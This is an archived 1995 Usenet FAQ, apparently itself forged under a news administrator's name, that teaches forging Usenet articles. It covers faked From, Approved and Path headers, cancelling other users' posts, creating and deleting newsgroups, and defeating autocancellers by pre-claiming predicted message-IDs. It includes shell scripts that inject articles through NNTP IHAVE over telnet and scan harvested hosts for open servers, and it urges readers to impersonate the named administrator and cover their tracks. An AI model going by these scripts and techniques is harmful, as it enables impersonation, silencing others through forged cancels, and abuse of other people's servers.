Article 25963 of alt.security: Newsgroups: comp.admin.policy,comp.security.misc,alt.security,misc.legal.computing,alt.censorship,alt.comp.acad-freedom.talk,alt.current-events.net-abuse Path: nntpd.lkg.dec.com!crl.dec.com!crl.dec.com!bloom-beacon.mit.edu!news.moneng.mei.com!news.ecn.bgu.edu!vixen.cso.uiuc.edu!news.cts.eiu.edu!ix.netcom.com!acad2!news-d.megaweb.com!uu.net!tale Subject: FAQ: Better living through forgery (Updated!) Expires: 8 Dec 1995 14:30 NNTP-Posting-host: pc002.uu.net Organization: UUNet Communications From: tale@uunet.uu.net (David C Lawrence) Approved: tale@uunet.uu.net Sender: tale@uunet.uu.net (David C Lawrence) Message-ID: <837177003.48888@uunet.uu.net> Date: Sun, 9 Jul 1995 15:39:03 GMT Lines: 184 Xref: nntpd.lkg.dec.com comp.admin.policy:6939 comp.security.misc:19044 alt.security:25963 misc.legal.computing:14877 alt.censorship:56369 alt.comp.acad-freedom.talk:17265 alt.current-events.net-abuse:29555 Anonymous netnews without "anonymous" remailers Inspired by the recent "NetNews Judges-L" events, this file has been updated to cover forging control messages. It is being posted periodically to address the increasing trend of "how do I fake news?" questions from the lamers, and the revelation that anonymous remailers are UNSAFE. In addition to anonymous posting, you can also do your own article canceling and create and destroy your own newsgroups using the information presented here. Save any news article to a file, with all the headers intact. Then edit this file, and remove any header lines of the form From some!random!path!user (note: "From ", not "From: " !!) Article: Lines: Xref: Shorten the Path: header down to its LAST two or three "bangized" components. This is to make the article look like it was posted from where it really was posted, and originally hit the net at or near the host you send it to. Or you can construct a completely new Path: line to reflect your assumed alias. Make some change to the Message-ID: field, that isn't likely to be duplicated anywhere. This is usually best done by adding a couple of random characters to the part before the @, since news posting programs generally use a fixed-length field to generate these IDs. Change the other headers to say what you like - From:, Newsgroups:, Sender:, etc. Replace the original message text with your message. If you are posting to a moderated group or posting a control message, remember to put in an Approved: header to bypass the moderation mechanism. To specifically cancel someone else's article, you need its message-ID. Your message headers, in addition to what's already there, should also contain the following with that message-ID in it. This makes it a "control message". Control messages also require an Approved: header, so add one. Subject: cmsg cancel Control: cancel Approved: luser@twits.site.com Newsgroups are created and destroyed with control messages, too. If you wanted to create, for instance, comp.misc.microsoft.sucks, your control headers would look like Subject: cmsg newgroup comp.misc.microsoft.sucks Control: newgroup comp.misc.microsoft.sucks Add on the string "moderated" at the end of these if you want the group to be "moderated with no moderator" as with alt.hackers. Somewhere in the body of your message, you should include the following text, changed with the description of the group you're creating: For your newsgroups file: comp.misc.microsoft.sucks We don't do windows To remove a group, substitute "rmgroup" for "newgroup" in the header lines above. Keep in mind that most sites run all "rmgroup" requests through a human news-master, who may or may not decide to honor it. Group creation is more likely to be automatic than deletion at most installations. Any newsgroup changes are more likely to take effect if the come from me, since my name is hardwired into many of the NNTP control scripts, so using the From: and Approved: headers from this posting is recommended. Save your changed article, check it to make sure it contains NO reference to yourself or your own site, and send it to your favourite NNTP server that permits transfers via the IHAVE command, using the following script: ======================= #! /bin/sh ## Post an article via IHAVE. ## args: filename server if test "$2" = "" ; then echo usage: $0 filename server exit 1 fi if test ! -f $1 ; then echo $1: not found exit 1 fi # suck msg-id out of headers, keep the brackets msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \ sed 's/.*-[Ii][Dd]: //'` echo $msgid ( sleep 5 echo IHAVE $msgid sleep 5 cat $1 sleep 1 echo "." sleep 1 echo QUIT ) | telnet $2 119 ======================= If your article doesn't appear in a few hours, try a different server. They are easy to find. Here's a script that will break a large file full of saved netnews into a list of hosts to try. Edit the output of this if you want, to remove obvious peoples' names and other trash. ======================= #! /bin/sh FGV='fgrep -i -v' egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\ /g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp ======================= Once you have your host list, feed it to the following script. ======================= #! /bin/sh while read xx ; do if test "$xx" = "" ; then continue; fi echo === $xx ( echo open $xx 119 sleep 5 echo ihave sleep 4 echo . echo quit sleep 1 echo quit ) | telnet done ======================= If the above script is called "findem" and you're using csh, you should do findem < list >& outfile so that ALL output from telnet is captured. This takes a long time, but when it finishes, edit "outfile" and look for occurrences of "335". These mark answers from servers that might be willing to accept an article. This isn't a completely reliable indication, since some servers respond with acceptance and later drop articles. Try a given server with a slightly modified repeat of someone else's message, and see if it eventually appears. You may have to monitor the finding script a little while it is running, to make sure one of the telnets does not hang for some reason. You will notice other servers that don't necessarily accept an IHAVE, but say "posting ok". You can do regular POSTS through these, but they may add an "NNTP-Posting-Host:" header containing the machine YOU came from and are therefore unsuitable for completely anonymous use. If you post a controversial article, such as this one or proprietary source code or threats to bomb Parliament, you can be fairly sure that someone will try to cancel it fairly quickly. In fact, some people may have automatic measures in place to detect and cancel articles that they didn't really post. But these mechanisms are often automated enough that you can defeat them and have your article stay in the news system a little longer. Given an original Message-ID of , some autocancellers will examine the original ID and issue control messages with predictable new IDs like or . You can take advantage of this and post some innocuous messages using these predicted message-IDs shortly beforehand. Once these articles are in the news system, they will block posting of the attempted automatic cancels. Then post your real message, and the autocancellers that use these original-ID permutations will fail to remove it! Your blocker-postings do not have to go to `control'. It does not matter which newsgroups they go to, as long as they are in the news system somewhere. Reposting a modified version of someone else's message is the subtlest way to claim a message-ID. This will not work, of course, if the canceller uses a new message ID, but it is worth mentioning. You may find the idea of cancel-ID prediction useful if you are being victimized by someone else's cancelmoose. Some autocancel formats seen in the control group are: -ORIG@HOST, cancel.ORIG@HOST, cancel-ORIG@HOST, Can_ORIG@HOST, ORIG.c@HOST. By far cancel.ORIG@HOST is most common. I probably need not say that if your article is REALLY controversial, attempts will be made to backtrace its origin. You should take appropriate measures to cover your tracks. Many organizations place their news servers outside their firewalls and packet filters, so for instance with a source-routing setup, you can pretend to be anyone. We maintain an IHAVE-friendly host is right here: news.uu.net. Feel free to test these scripts through our server. PLEASE USE THE INFORMATION IN THIS ARTICLE FOR CONSTRUCTIVE PURPOSES ONLY.